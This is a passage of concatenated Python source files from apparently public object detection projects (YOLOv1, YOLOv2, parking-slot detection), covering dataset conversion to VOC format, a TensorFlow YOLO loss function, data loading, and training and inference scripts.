import json
import glob
import shutil
from tqdm import tqdm
from PIL import Image
from shutil import copy
import numpy as np
import tensorflow as tf
def rename_datas(root_path, dst_path):
src_image_dir = os.path.join(root_path, "images")
src_label_dir = os.path.join(root_path, "labels")
dst_image_dir = os.path.join(dst_path, "images")
dst_label_dir = os.path.join(dst_path, "labels")
image_count = 0
for root, dirs, files in os.walk(src_image_dir):
for name in files:
print(os.path.join(root, name))
src_image_path = os.path.join(root, name)
src_label_path = os.path.join(root.replace("images", "labels"), name.replace("png", "json"))
dst_image_path = os.path.join(dst_image_dir, '%08d' % int(image_count))
dst_label_path = os.path.join(dst_label_dir, '%08d' % int(image_count))
shutil.copy(src_image_path, dst_image_path + '.png')
shutil.copy(src_label_path, dst_label_path + '.json')
image_count += 1
def get_files(path, _ends=['*.json']):
all_files = []
for _end in _ends:
files = glob.glob(os.path.join(path, _end))
all_files.extend(files)
file_num = len(all_files)
return all_files, file_num
def get_size(result_dict):
obj_size = result_dict['size']
width = obj_size["width"]
height = obj_size["height"]
return width, height
def write_to_txt(out_txt_path,result):
with open(os.path.join(out_txt_path, 'train.txt'), 'w') as json_file:
for text in result:
#print(text)
json_file.write(text + '\n')
def get_text_mark(file_path, voc_file_path, out_Annotations_path):
xml_content = []
print(file_path)
name = file_path.split('/')[-1]
name = name.split('.')[0]
with open(file_path, 'r', encoding='utf-8') as fid:
result_dict = json.load(fid)
obj = result_dict['outputs']['object']
width, height = get_size(result_dict)
xml_content.append("<annotation>")
xml_content.append(" <folder>" + voc_file_path + "</folder>")
xml_content.append(" #" + name + '.jpg' + "</filename>")
xml_content.append(" <size>")
xml_content.append(" <width>" + str(width) + "</width>")
xml_content.append(" <height>" + str(height) + "</height>")
xml_content.append(" </size>")
xml_content.append(" <segmented>0</segmented>")
for obj_item in obj:
cate_name = obj_item['name']
coords = obj_item['bndbox']
try:
bbox = [float(coords['xmin']),float(coords['ymin']),float(coords['xmax']),float(coords['ymax'])]
xml_content.append(" <object>")
xml_content.append(" <name>" + cate_name + "</name>")
xml_content.append(" <pose>Unspecified</pose>")
xml_content.append(" <truncated>0</truncated>")
xml_content.append(" <difficult>0</difficult>")
xml_content.append(" <bndbox>")
xml_content.append(" <xmin>" + str(int(bbox[0])) + "</xmin>")
xml_content.append(" <ymin>" + str(int(bbox[1])) + "</ymin>")
xml_content.append(" <xmax>" + str(int(bbox[2])) + "</xmax>")
xml_content.append(" <ymax>" + str(int(bbox[3])) + "</ymax>")
xml_content.append(" </bndbox>")
xml_content.append(" </object>")
except:
continue
xml_content.append("</annotation>")
x = xml_content
xml_content = [x[i] for i in range(0, len(x)) if x[i] != "\n"]
xml_path = os.path.join(out_Annotations_path, name + '.xml')
with open(xml_path, 'w+', encoding="utf8") as f:
f.write('\n'.join(xml_content))
xml_content[:] = []
return
def json2voc(src_path, dst_path):
src_image_dir = os.path.join(src_path, "images")
src_label_dir = os.path.join(src_path, "labels")
dst_Annotations_dir = os.path.join(dst_path, "Annotations")
dst_ImageSets_dir = os.path.join(dst_path, "ImageSets/Main")
dst_JPEGImages_dir = os.path.join(dst_path, "JPEGImages")
train_list = []
filelist = os.listdir(src_image_dir)
for i in filelist:
try:
src = os.path.join(os.path.abspath(src_image_dir), i)
name = i.split('.')[0]
# print(name)
train_list.append(name)
dst = os.path.join(os.path.abspath(dst_JPEGImages_dir), name + '.jpg')
im = Image.open(src)
im = im.convert('RGB')
im.save(dst, quality=95)
except:
print(i + 'wrong')
continue
write_to_txt(dst_ImageSets_dir, train_list)
files, files_len = get_files(src_label_dir)
for file in files:
try:
get_text_mark(file, dst_path, dst_Annotations_dir)
except:
print(file + 'wrong')
continue
def read_class_names(classes_file):
names = {}
with open(classes_file, 'r') as data:
for id, name in enumerate(data):
names[name.strip('\n')] = id
return names
def read_anchors(anchors_file):
anchors = []
with open(anchors_file) as f:
data = f.readline()
data = data.split(',')
for i in range(0, len(data), 2):
anchors.append([int(data[i]), int(data[i + 1])])
return anchors
def total_sample(file_name):
sample_nums = 0
for record in tf.python_io.tf_record_iterator(file_name):
sample_nums += 1
return sample_nums
if __name__ == '__main__':
json2voc('/home/chenwei/HDD/Project/2D_ObjectDetect/datasets/self_datasets', '/home/chenwei/HDD/Project/2D_ObjectDetect/datasets/self_datasets/voc')
#rename_datas("/home/chenwei/HDD/Project/datasets/segmentation/周视数据", "/home/chenwei/HDD/Project/2D_ObjectDetect/datasets/self_datasets")
```
#### File: Parking-slot-Detection/utils/show_xml_label.py
```python
import sys
ros_path = '/opt/ros/kinetic/lib/python2.7/dist-packages'
if ros_path in sys.path:
sys.path.remove(ros_path)
import os
import cv2
import re
pattens = ['name', 'xmin', 'ymin', 'xmax', 'ymax']
def get_annotations(xml_path):
bbox = []
with open(xml_path, 'r') as f:
text = f.read().replace('\n', 'return')
p1 = re.compile(r'(?<=<object>)(.*?)(?=</object>)')
result = p1.findall(text)
for obj in result:
tmp = []
for patten in pattens:
p = re.compile(r'(?<=<{}>)(.*?)(?=</{}>)'.format(patten, patten))
if patten == 'name':
tmp.append(p.findall(obj)[0])
else:
tmp.append(int(float(p.findall(obj)[0])))
bbox.append(tmp)
return bbox
def save_viz_image(image_path, xml_path, save_path):
bbox = get_annotations(xml_path)
image = cv2.imread(image_path)
for info in bbox:
cv2.rectangle(image, (info[1], info[2]), (info[3], info[4]), (255, 0, 0), thickness=2)
cv2.putText(image, info[0], (info[1], info[2]), cv2.FONT_HERSHEY_PLAIN, 2,(0, 0, 255), 2)
if not os.path.exists(save_path):
os.mkdir(save_path)
cv2.imwrite(os.path.join(save_path, image_path.split('/')[-1]), image)
def show_and_save(path):
image_dir = 'JPEGImages'
xml_dir = 'Annotations'
save_dir = 'viz_images'
image_path1 = os.path.join(os.path.abspath(path), image_dir)
xml_path1 = os.path.join(os.path.abspath(path), xml_dir)
save_path = os.path.join(os.path.abspath(path), save_dir)
image_list = os.listdir(image_path1)
for i in image_list:
image_path = os.path.join(image_path1, i)
xml_path = os.path.join(xml_path1, i.replace('.png', '.xml'))
save_viz_image(image_path, xml_path, save_path)
def write_txt(root_path):
src_ImageSets_dir = os.path.join(root_path, "ImageSets/Main")
src_JPEGImages_dir = os.path.join(root_path, "JPEGImages")
train_list = []
filelist = os.listdir(src_JPEGImages_dir)
for i in filelist:
try:
name = i.split('png')[0]
# print(name)
train_list.append(name[:-1])
except:
print(i + 'wrong')
continue
with open(os.path.join(src_ImageSets_dir, 'train.txt'), 'w') as json_file:
for text in train_list:
# print(text)
json_file.write(text + '\n')
if __name__ == '__main__':
# write_txt("/home/chenwei/HDD/Project/Parking-slot-Detection/datasets/voc_bosh_clyinder")
path = '/home/chenwei/HDD/Project/Parking-slot-Detection/datasets/voc_bosh_clyinder'
show_and_save(path)
``` |
{
"source": "530824679/YOLOv1",
"score": 3
} |
#### File: YOLOv1/utils/loss_utils.py
```python
import tensorflow as tf
from cfg.config import model_params, solver_params
class Loss(object):
def __init__(self, predicts, labels, scope='loss'):
"""
:param predicts:网络的输出 [batch, cell_size * cell_size * (5 * boxes_per_cell + class_num)]
:param labels:标签信息 [batch, cell_size, cell_size, 5 + class_num]
:param scope:命名loss
"""
self.batch_size = solver_params['batch_size']
self.image_size = model_params['image_size']
self.cell_size = model_params['cell_size']
self.num_class = model_params['num_classes']
self.boxes_per_cell = model_params['boxes_per_cell']
self.boundary1 = model_params['cell_size'] * model_params['cell_size'] * model_params['num_classes']
self.boundary2 = self.boundary1 + model_params['cell_size'] * model_params['cell_size'] * model_params['boxes_per_cell']
self.class_scale = model_params['class_scale']
self.object_scale = model_params['object_scale']
self.noobject_scale = model_params['noobject_scale']
self.coord_scale = model_params['coord_scale']
self.loss_layer(predicts, labels, scope='loss')
def loss_layer(self, predicts, labels, scope='loss'):
# 预测坐标:x, y中心点基于cell, sqrt(w),sqrt(h)基于全图0-1范围
with tf.name_scope('Predicts_Tensor'):
# 类别预测 predicts reshape ——> [batch_size, 7, 7, 20]
predicts_classes = tf.reshape(predicts[:, :self.boundary1], [self.batch_size, self.cell_size, self.cell_size, self.num_class])
# 置信度预测 predicts reshape ——> [batch_size, 7, 7, 2]
predicts_scales = tf.reshape(predicts[:, self.boundary1:self.boundary2], [self.batch_size, self.cell_size, self.cell_size, self.boxes_per_cell])
# 坐标预测 predicts reshape ——> [batch_size, 7, 7, 2, 4]
predicts_boxes = tf.reshape(predicts[:, self.boundary2:], [self.batch_size, self.cell_size, self.cell_size, self.boxes_per_cell, 4])
# 标签坐标: x, y, w, h 基于全图0-1范围
with tf.name_scope('Labels_Tensor'):
# labels reshape ——> [batch_size, 7, 7, 1] 哪个网格负责检测目标就标记为1
labels_response = tf.reshape(labels[..., 0], [self.batch_size, self.cell_size, self.cell_size, 1])
# 坐标标签 labels reshape ——> [batch_size, 7, 7, 2, 4] 网格内负责检测的外接框位置以图像大小为基准(x, y, width, height)
labels_boxes = tf.reshape(labels[..., 1:5], [self.batch_size, self.cell_size, self.cell_size, 1, 4])
labels_boxes = tf.tile(labels_boxes, [1, 1, 1, self.boxes_per_cell, 1]) / self.image_size
# 类别标签 labels reshape ——> [batch, 7, 7, 20]
labels_classes = labels[..., 5:]
'''
# 将网络所预测的bbox相对于cell的偏移量转换为bbox的中心坐标在图像中的比例
offset = np.transpose(np.reshape(np.array([np.arange(para.cell_size)] * para.cell_size * para.box_per_cell),
(para.box_per_cell, para.cell_size, para.cell_size)), (1, 2, 0))
# 转换为四维矩阵
offset = tf.reshape(tf.constant(offset, dtype=tf.float32), [1, para.cell_size, para.cell_size, para.box_per_cell])
# 将第0维复制batch_size次
offset = tf.tile(offset, [para.batch_size, 1, 1, 1])
offset_tran = tf.transpose(offset, (0, 2, 1, 3))
'''
with tf.variable_scope(scope):
# 类别损失
class_loss = self.class_loss(predicts_classes, labels_classes, labels_response)
# 基于cell的x, y 基于全图的sqrt(w), sqrt(h)——>基于全图的x, y, w, h
global_predict_boxes = self.predicts_to_labels_coord(predicts_boxes)
# 计算iou [batch , 7, 7, 2]
iou = self.calc_iou(global_predict_boxes, labels_boxes)
# 计算有目标和无目标掩码
object_mask, noobject_mask = self.calc_mask(iou, labels_response)
# 置信度损失
object_loss, noobject_loss = self.confidence_loss(predicts_scales, iou, object_mask, noobject_mask)
# 坐标损失
boxes_loss = self.coord_loss(predicts_boxes, labels_boxes, object_mask)
tf.losses.add_loss(class_loss)
tf.losses.add_loss(object_loss)
tf.losses.add_loss(noobject_loss)
tf.losses.add_loss(boxes_loss)
tf.summary.scalar('class_loss', class_loss)
tf.summary.scalar('object_loss', object_loss)
tf.summary.scalar('noobject_loss', noobject_loss)
tf.summary.scalar('boxes_loss', boxes_loss)
tf.summary.histogram('iou', iou)
def class_loss(self, predicts_class, labels_class, labels_response):
"""
计算分类损失
:param predicts_class: 预测类别[batch, 7, 7, 20]
:param labels_class: 标签类别[batch, 7, 7, 20]
:param labels_response: cell中是否有目标[batch, 7, 7, 1]
:return:
"""
with tf.name_scope('class_loss'):
class_delta = labels_response * (predicts_class - labels_class)
class_loss = self.class_scale * tf.reduce_mean(tf.reduce_sum(tf.square(class_delta), axis=[1, 2, 3]), name='class_loss')
return class_loss
def confidence_loss(self, predicts_scale, iou, object_mask, noobject_mask):
'''
计算置信度损失
:param predicts_scale: 预测置信度 [batch, 7, 7, 2]
:param iou: iou结果 [batch, 7, 7, 2]
:param object_mask: 目标掩码 [batch, 7, 7, 2], 有目标位置为1,其余0
:param noobject_mask: 无目标掩码 [batch, 7, 7, 2], 无目标位置为1,其余0
:return:
'''
with tf.name_scope('confidence_loss'):
with tf.name_scope('object_confidence_loss'):
object_confidence_delta = object_mask * (predicts_scale - iou)
object_confidence_loss = self.object_scale * tf.reduce_mean(tf.reduce_sum(tf.square(object_confidence_delta), axis=[1, 2, 3]))
with tf.name_scope('noobject_confidence_loss'):
noobject_confidence_delta = noobject_mask * (predicts_scale - 0)
noobject_confidence_loss = self.noobject_scale * tf.reduce_mean(tf.reduce_sum(tf.square(noobject_confidence_delta), axis=[1, 2, 3]))
return object_confidence_loss, noobject_confidence_loss
def coord_loss(self, predicts_boxes, labels_boxes, object_mask):
'''
计算定位损失
:param predicts_boxes: 预测置位置 基于cell的x, y以及全图 sqrt(w), sqrt(h) [batch, 7, 7, 2, 4]
:param labels_boxes: 标签位置 基于全图的x, y, w, h [batch, 7, 7, 2, 4]
:param object_mask: 有目标的掩码 [batch, 7, 7, 2]
:return:
'''
with tf.name_scope('coord_loss'):
coord_mask = tf.expand_dims(object_mask, axis=-1)
cell_labals_boxes = self.labels_to_predicts_coord(labels_boxes)
coord_delta = coord_mask * (predicts_boxes - cell_labals_boxes)
boxes_loss = self.coord_scale * tf.reduce_mean(tf.reduce_sum(tf.square(coord_delta), axis=[1, 2, 3, 4]))
tf.summary.histogram('boxes_delta_x', coord_delta[..., 0])
tf.summary.histogram('boxes_delta_y', coord_delta[..., 1])
tf.summary.histogram('boxes_delta_w', coord_delta[..., 2])
tf.summary.histogram('boxes_delta_h', coord_delta[..., 3])
return boxes_loss
def predicts_to_labels_coord(self, predicts_boxes):
# 边界框的中心坐标xy——相对于每个cell左上点的偏移量
offset_axis_2 = tf.tile(tf.expand_dims(tf.range(7), axis=0), multiples=[7, 1])
offset_axis_2 = tf.tile(tf.reshape(offset_axis_2, shape=[1, 7, 7, 1]), multiples=[self.batch_size, 1, 1, 2])
offset_axis_1 = tf.transpose(offset_axis_2, (0, 2, 1, 3))
offset_axis_2 = tf.cast(offset_axis_2, dtype=tf.float32)
offset_axis_1 = tf.cast(offset_axis_1, dtype=tf.float32)
x = (predicts_boxes[..., 0] + offset_axis_2) / self.cell_size
y = (predicts_boxes[..., 1] + offset_axis_1) / self.cell_size
w = tf.square(predicts_boxes[..., 2])
h = tf.square(predicts_boxes[..., 3])
global_predicts_boxes = tf.stack([x, y, w, h], axis=-1)
return global_predicts_boxes
def labels_to_predicts_coord(self, labels_boxes):
# 得到x, y相对于该cell左上角的偏移值, 宽度和高度是相对于整张图片的比例
offset_axis_2 = tf.tile(tf.expand_dims(tf.range(7), axis=0), multiples=[7, 1])
offset_axis_2 = tf.tile(tf.reshape(offset_axis_2, shape=[1, 7, 7, 1]), multiples=[self.batch_size, 1, 1, 2])
offset_axis_1 = tf.transpose(offset_axis_2, (0, 2, 1, 3))
offset_axis_2 = tf.cast(offset_axis_2, dtype=tf.float32)
offset_axis_1 = tf.cast(offset_axis_1, dtype=tf.float32)
x = labels_boxes[..., 0] * self.cell_size - offset_axis_2
y = labels_boxes[..., 1] * self.cell_size - offset_axis_1
sqrt_w = tf.sqrt(labels_boxes[..., 2])
sqrt_h = tf.sqrt(labels_boxes[..., 3])
cell_labals_boxes = tf.stack([x, y, sqrt_w, sqrt_h], axis=-1)
return cell_labals_boxes
def calc_iou(self, boxes_1, boxes_2, scope='iou'):
'''
计算BBoxes和label的iou
:param boxes_1: 预测的Boxes [batch, cell, cell, boxes_per_cell, 4] / [x, y, w, h]
:param boxes_2: 标签的Boxes [batch, cell, cell, boxes_per_cell, 4] / [x, y, w, h]
:param scope: 命名空间iou
:return:
'''
with tf.name_scope(scope):
# transform [center_x, center_y, w, h]——>[x1, y1, x2, y2]
boxes1 = tf.stack([boxes_1[..., 0] - boxes_1[..., 2] / 2.0,
boxes_1[..., 1] - boxes_1[..., 3] / 2.0,
boxes_1[..., 0] + boxes_1[..., 2] / 2.0,
boxes_1[..., 1] + boxes_1[..., 3] / 2.0], axis=-1)
boxes2 = tf.stack([boxes_2[..., 0] - boxes_2[..., 2] / 2.0,
boxes_2[..., 1] - boxes_2[..., 3] / 2.0,
boxes_2[..., 0] + boxes_2[..., 2] / 2.0,
boxes_2[..., 1] + boxes_2[..., 3] / 2.0], axis=-1)
lu = tf.maximum(boxes1[..., :2], boxes2[..., :2])
rd = tf.minimum(boxes1[..., 2:], boxes2[..., 2:])
# [batch, 7, 7, 2] 2个bbox跟label的iou
intersection_wh = tf.maximum(0.0, rd - lu)
intersection_area = intersection_wh[..., 0] * intersection_wh[..., 1]
square1 = boxes1[..., 2] * boxes1[..., 3]
square2 = boxes2[..., 2] * boxes2[..., 3]
union_area = tf.maximum(square1 + square2 - intersection_area, 1e-10)
return tf.clip_by_value(intersection_area / union_area, 0.0, 1.0)
def calc_mask(self, iou, response):
'''
计算目标/非目标掩码
:param iou: 2个BBox的iou [batch, 7, 7, 2]
:param response: [batch, 7, 7, 1]
:return: 有目标掩码[batch, 7, 7, 2] 无目标掩码[batch, 7, 7, 2]
'''
# 计算各个cell各自所预测的几个边界框中的IOU的最大值
object_mask = tf.reduce_max(iou, axis=-1, keep_dims=True)
# 其维度为[batch_size, 7, 7, 2] 如果cell中真实有目标,那么该cell内iou最大的那个框的相应位置为1(就是负责预测该框),其余为0
object_mask = tf.cast((iou >= object_mask), tf.float32)
# 首先得出当前cell中负责进行目标预测的框,再与真实的置信度进行点乘,得出真实的包含有目标的cell中负责进行目标预测的框.
object_mask = object_mask * response
# 没有目标的框其维度为[batch_size, 7 , 7, 2], 真实没有目标的区域都为1,真实有目标的区域为0
no_object_mask = tf.ones_like(object_mask, dtype=tf.float32) - object_mask
return object_mask, no_object_mask
``` |
{
"source": "530824679/YOLOv2",
"score": 2
} |
#### File: YOLOv2/data/dataset.py
```python
import sys
ros_path = '/opt/ros/kinetic/lib/python2.7/dist-packages'
if ros_path in sys.path:
sys.path.remove(ros_path)
import cv2
import os
from PIL import Image
import math
import numpy as np
import tensorflow as tf
from cfg.config import path_params, model_params, classes_map
from utils.process_utils import *
from data.augmentation import *
class Dataset(object):
def __init__(self):
self.data_path = path_params['data_path']
self.anchors = model_params['anchors']
self.num_classes = model_params['classes']
self.input_height = model_params['input_height']
self.input_width = model_params['input_width']
self.grid_height = model_params['grid_height']
self.grid_width = model_params['grid_width']
self.iou_threshold = model_params['iou_threshold']
def convert(self, data):
"""
transform [x,y,w,h,class_id to [x1,y1,x2,y2, class_id]
:param data: label data shape is [5,]
:return: [x1, y1, x2, y2, class_id]
"""
x1 = data[1] - data[3] / 2.0
y1 = data[2] - data[4] / 2.0
x2 = data[1] + data[3] / 2.0
y2 = data[2] + data[4] / 2.0
class_id = data[0]
return [x1, y1, x2, y2, class_id]
def letterbox_resize(self, image, bboxes, new_height, new_width, interp=0):
"""
Resize the image and correct the bbox accordingly.
:param image: BGR image data shape is [height, width, channel]
:param bboxes: bounding box shape is [num, 4]
:param new_height: new image height
:param new_width: new image width
:param interp:
:return: image_padded, bboxes
"""
origin_height, origin_width = image.shape[:2]
resize_ratio = min(new_width / origin_width, new_height / origin_height)
resize_width = int(resize_ratio * origin_width)
resize_height = int(resize_ratio * origin_height)
image = cv2.resize(image, (resize_width, resize_height), interpolation=interp)
image_padded = np.full((new_height, new_width, 3), 128, np.uint8)
dw = int((new_width - resize_width) / 2)
dh = int((new_height - resize_height) / 2)
image_padded[dh:resize_height + dh, dw:resize_width + dw, :] = image
# xmin, xmax, ymin, ymax
bboxes[:, [0, 2]] = bboxes[:, [0, 2]] * resize_ratio + dw
bboxes[:, [1, 3]] = bboxes[:, [1, 3]] * resize_ratio + dh
return image_padded, bboxes
def load_data(self, filename):
"""
load image and label
:param filename: file name
:return: image_raw, bbox_raw, image_shape
"""
image_path = os.path.join(self.data_path, "images", filename+'.jpg')
image = cv2.imread(image_path)
image_shape = image.shape
label_path = os.path.join(self.data_path, "labels", filename+'.txt')
lines = [line.rstrip() for line in open(label_path)]
bboxes = []
for line in lines:
data = line.split(' ')
data[0:] = [float(t) for t in data[0:]]
box = self.convert(data)
bboxes.append(box)
while len(bboxes) < 150:
bboxes = np.append(bboxes, [[0.0, 0.0, 0.0, 0.0, 0.0]], axis=0)
bboxes = np.array(bboxes, dtype=np.float32)
image_raw = image.tobytes()
bbox_raw = bboxes.tobytes()
return image_raw, bbox_raw, image_shape
def preprocess_true_data(self, image, labels):
"""
preprocess true boxes to train input format
:param image: numpy.ndarray of shape [416, 416, 3]
:param labels: numpy.ndarray of shape [20, 5]
shape[0]: the number of labels in each image.
shape[1]: x_min, y_min, x_max, y_max, class_index, yaw
:return:
image_norm is normalized image[0~1]
y_true shape is [feature_height, feature_width, per_anchor_num, 5 + num_classes]
"""
# 数据增广,包括水平翻转,裁剪,平移
image = np.array(image)
image, labels = random_horizontal_flip(image, labels)
image, labels = random_crop(image, labels)
image, labels = random_translate(image, labels)
# 图像尺寸缩放到416*416,并进行归一化
image_rgb = cv2.cvtColor(np.copy(image), cv2.COLOR_BGR2RGB).astype(np.float32)
image_rgb, labels = letterbox_resize(image_rgb, (self.input_height, self.input_width), np.copy(labels), interp=0)
image_norm = image_rgb / 255.
input_shape = np.array([self.input_height, self.input_width], dtype=np.int32)
assert input_shape[0] % 32 == 0
assert input_shape[1] % 32 == 0
feature_sizes = input_shape // 32
# anchors 归一化到图像空间0~1
num_anchors = len(self.anchors)
anchor_array = np.array(model_params['anchors'])
# labels 去除空标签
valid = (np.sum(labels, axis=-1) > 0).tolist()
labels = labels[valid]
y_true = np.zeros(shape=[feature_sizes[0], feature_sizes[1], num_anchors, 4 + 1 + len(self.num_classes)], dtype=np.float32)
boxes_xy = (labels[:, 0:2] + labels[:, 2:4]) / 2
boxes_wh = labels[:, 2:4] - labels[:, 0:2]
true_boxes = np.concatenate([boxes_xy, boxes_wh], axis=-1)
anchors_max = anchor_array / 2.
anchors_min = - anchor_array / 2.
valid_mask = boxes_wh[:, 0] > 0
wh = boxes_wh[valid_mask]
# [N, 1, 2]
wh = np.expand_dims(wh, -2)
boxes_max = wh / 2.
boxes_min = - wh / 2.
# [N, 1, 2] & [5, 2] ==> [N, 5, 2]
intersect_mins = np.maximum(boxes_min, anchors_min)
intersect_maxs = np.minimum(boxes_max, anchors_max)
# [N, 5, 2]
intersect_wh = np.maximum(intersect_maxs - intersect_mins, 0.)
intersect_area = intersect_wh[..., 0] * intersect_wh[..., 1]
box_area = wh[..., 0] * wh[..., 1]
anchor_area = anchor_array[:, 0] * anchor_array[:, 1]
# [N, 5]
iou = intersect_area / (box_area + anchor_area - intersect_area + tf.keras.backend.epsilon())
# Find best anchor for each true box [N]
best_anchor = np.argmax(iou, axis=-1)
for t, k in enumerate(best_anchor):
i = int(np.floor(true_boxes[t, 0] / 32.))
j = int(np.floor(true_boxes[t, 1] / 32.))
c = labels[t, 4].astype('int32')
y_true[j, i, k, 0:4] = true_boxes[t, 0:4]
y_true[j, i, k, 4] = 1
y_true[j, i, k, 5 + c] = 1
return image_norm, y_true
```
#### File: 530824679/YOLOv2/test.py
```python
import sys
ros_path = '/opt/ros/kinetic/lib/python2.7/dist-packages'
if ros_path in sys.path:
sys.path.remove(ros_path)
import cv2
import tensorflow as tf
from utils.process_utils import *
from model.network import Network
from cfg.config import *
os.environ["CUDA_VISIBLE_DEVICES"]="0"
def predict_video():
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
capture = cv2.VideoCapture(0)
input = tf.placeholder(shape=[1, None, None, 3], dtype=tf.float32)
network = Network(is_train=False)
logits = network.build_network(input)
output = network.reorg_layer(logits, model_params['anchors'])
checkpoints = "./checkpoints/model.ckpt-128"
saver = tf.train.Saver()
with tf.Session(config=config) as sess:
saver.restore(sess, checkpoints)
while (True):
ref, image = capture.read()
image_size = image.shape[:2]
input_shape = [model_params['input_height'], model_params['input_width']]
image_data = pre_process(image, input_shape)
image_data = image_data[np.newaxis, ...]
bboxes, obj_probs, class_probs = sess.run(output, feed_dict={input: image_data})
bboxes, scores, class_id = postprocess(bboxes, obj_probs, class_probs, image_shape=image_size, input_shape=input_shape)
img_detection = visualization(image, bboxes, scores, class_id, model_params["classes"])
cv2.imshow("result", img_detection)
cv2.waitKey(1)
cv2.destroyAllWindows()
def predict_image():
image_path = "/home/chenwei/HDD/Project/datasets/object_detection/FDDB2016/convert/images/2002_07_19_big_img_130.jpg"
image = cv2.imread(image_path)
image_size = image.shape[:2]
input_shape = [model_params['input_height'], model_params['input_width']]
image_data = pre_process(image, input_shape)
image_data = image_data[np.newaxis, ...]
input = tf.placeholder(shape=[1, None, None, 3], dtype=tf.float32)
network = Network(is_train=False)
logits = network.build_network(input)
output = network.reorg_layer(logits, model_params['anchors'])
checkpoints = "./checkpoints/model.ckpt-128"
saver = tf.train.Saver()
with tf.Session() as sess:
saver.restore(sess, checkpoints)
bboxes, obj_probs, class_probs = sess.run(output, feed_dict={input: image_data})
bboxes, scores, class_id = postprocess(bboxes, obj_probs, class_probs, image_shape=image_size, input_shape=input_shape)
img_detection = visualization(image, bboxes, scores, class_id, model_params["classes"])
cv2.imshow("result", img_detection)
cv2.waitKey(0)
if __name__ == "__main__":
predict_video()
```
#### File: 530824679/YOLOv2/train.py
```python
import os
import time
import math
import numpy as np
import tensorflow as tf
from tqdm import tqdm
import tensorflow.contrib.slim as slim
from cfg.config import path_params, solver_params
from utils.dataset_utils import total_sample
from model.network import Network
from data import tfrecord
def train():
start_step = 0
log_step = solver_params['log_step']
restore = solver_params['restore']
checkpoint_dir = path_params['checkpoints_dir']
checkpoints_name = path_params['checkpoints_name']
tfrecord_dir = path_params['tfrecord_dir']
tfrecord_name = path_params['train_tfrecord_name']
log_dir = path_params['logs_dir']
batch_size = solver_params['batch_size']
# 配置GPU
gpu_options = tf.GPUOptions(allow_growth=True)
config = tf.ConfigProto(gpu_options=gpu_options)
# 解析得到训练样本以及标注
data = tfrecord.TFRecord()
train_tfrecord = os.path.join(tfrecord_dir, tfrecord_name)
data_num = total_sample(train_tfrecord)
batch_num = int(math.ceil(float(data_num) / batch_size))
dataset = data.create_dataset(train_tfrecord, batch_num, batch_size=batch_size, is_shuffle=True)
iterator = dataset.make_one_shot_iterator()
images, y_true = iterator.get_next()
images.set_shape([None, 416, 416, 3])
y_true.set_shape([None, 13, 13, 5, 6])
# 构建网络
network = Network(is_train=True)
logits = network.build_network(images)
# 计算损失函数
total_loss, diou_loss, confs_loss, class_loss = network.calc_loss(logits, y_true)
global_step = tf.Variable(0, trainable=False)
learning_rate = tf.train.exponential_decay(solver_params['lr'], global_step, solver_params['decay_steps'], solver_params['decay_rate'], staircase=True)
optimizer = tf.train.AdamOptimizer(learning_rate)
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
train_op = optimizer.minimize(total_loss, global_step=global_step)
# 配置tensorboard
tf.summary.scalar("learning_rate", learning_rate)
tf.summary.scalar('total_loss', total_loss)
tf.summary.scalar("diou_loss", diou_loss)
tf.summary.scalar("confs_loss", confs_loss)
tf.summary.scalar("class_loss", class_loss)
# 配置tensorboard
summary_op = tf.summary.merge_all()
summary_writer = tf.summary.FileWriter(log_dir, graph=tf.get_default_graph(), flush_secs=60)
# 模型保存
save_variable = tf.global_variables()
saver = tf.train.Saver(save_variable, max_to_keep=50)
with tf.Session(config=config) as sess:
sess.run([tf.global_variables_initializer(), tf.local_variables_initializer()])
if restore == True:
ckpt = tf.train.get_checkpoint_state(checkpoint_dir)
if ckpt and ckpt.model_checkpoint_path:
stem = os.path.basename(ckpt.model_checkpoint_path)
restore_step = int(stem.split('.')[0].split('-')[-1])
start_step = restore_step
sess.run(global_step.assign(restore_step))
saver.restore(sess, ckpt.model_checkpoint_path)
print('Restoreing from {}'.format(ckpt.model_checkpoint_path))
else:
print("Failed to find a checkpoint")
if solver_params['pre_train']:
pretrained = np.load(path_params['pretrain_weights'], allow_pickle=True).item()
for variable in tf.trainable_variables():
for key in pretrained.keys():
key2 = variable.name.rstrip(':0')
if (key == key2):
sess.run(tf.assign(variable, pretrained[key]))
summary_writer.add_graph(sess.graph)
print('\n----------- start to train -----------\n')
for epoch in range(start_step + 1, solver_params['epoches']):
train_epoch_loss, train_epoch_diou_loss, train_epoch_confs_loss, train_epoch_class_loss = [], [], [], []
for index in tqdm(range(batch_num)):
_, summary_, loss_, diou_loss_, confs_loss_, class_loss_, global_step_, lr = sess.run([train_op, summary_op, total_loss, diou_loss, confs_loss, class_loss, global_step, learning_rate])
train_epoch_loss.append(loss_)
train_epoch_diou_loss.append(diou_loss_)
train_epoch_confs_loss.append(confs_loss_)
train_epoch_class_loss.append(class_loss_)
summary_writer.add_summary(summary_, global_step_)
train_epoch_loss, train_epoch_diou_loss, train_epoch_confs_loss, train_epoch_class_loss = np.mean(train_epoch_loss), np.mean(train_epoch_diou_loss), np.mean(train_epoch_confs_loss), np.mean(train_epoch_class_loss)
print("Epoch: {}, global_step: {}, lr: {:.8f}, total_loss: {:.3f}, diou_loss: {:.3f}, confs_loss: {:.3f}, class_loss: {:.3f}".format(epoch, global_step_, lr, train_epoch_loss, train_epoch_diou_loss, train_epoch_confs_loss, train_epoch_class_loss))
saver.save(sess, os.path.join(checkpoint_dir, checkpoints_name), global_step=epoch)
sess.close()
if __name__ == '__main__':
train()
```
#### File: YOLOv2/utils/dataset_utils.py
```python
import os
import sys
ros_path = '/opt/ros/kinetic/lib/python2.7/dist-packages'
if ros_path in sys.path:
sys.path.remove(ros_path)
import cv2
sys.path.append('/opt/ros/kinetic/lib/python2.7/dist-packages')
import numpy as np
import tensorflow as tf
from cfg.config import path_params
def total_sample(file_name):
sample_nums = 0
for record in tf.python_io.tf_record_iterator(file_name):
sample_nums += 1
return sample_nums
def create_trainval_txt(root_path):
data_path = os.path.join(root_path, 'images')
trainval = os.path.join(root_path, 'trainval.txt')
if os.path.exists(trainval):
os.remove(trainval)
file_obj = open(trainval, 'w', encoding='utf-8')
file_list = os.listdir(data_path)
for file in file_list:
filename = os.path.splitext(file)[0]
file_obj.writelines(filename)
file_obj.write('\n')
file_obj.close()
def create_fddb_txt():
annotation_dir = "/home/chenwei/HDD/Project/datasets/object_detection/FDDB2016/FDDB-folds"
origin_image_dir = "/home/chenwei/HDD/Project/datasets/object_detection/FDDB2016/originalPics"
